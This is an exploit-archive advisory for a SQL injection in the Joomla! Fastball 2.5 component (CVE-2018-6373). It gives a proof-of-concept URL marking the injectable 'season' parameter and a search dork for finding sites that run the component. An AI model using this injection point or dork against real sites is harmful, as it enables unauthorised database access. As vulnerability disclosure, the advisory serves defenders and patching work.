Joomla! Fastball 2.5 SQL Injection

Related Vulnerabilities: CVE-2018-6373  
Publish Date: 17 Feb 2018
Author: Ihsan Sencan
                							

                # # # #
# Exploit Title: Joomla! Component Fastball 2.5 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://www.fastballproductions.com/
# Software Link: http://www.fastballproductions.com/
# Version: 2.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6373
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_fastball&view=player&season=[SQL]
#  
# # # #
 
inurl:index.php?option=com_fastball season

<p>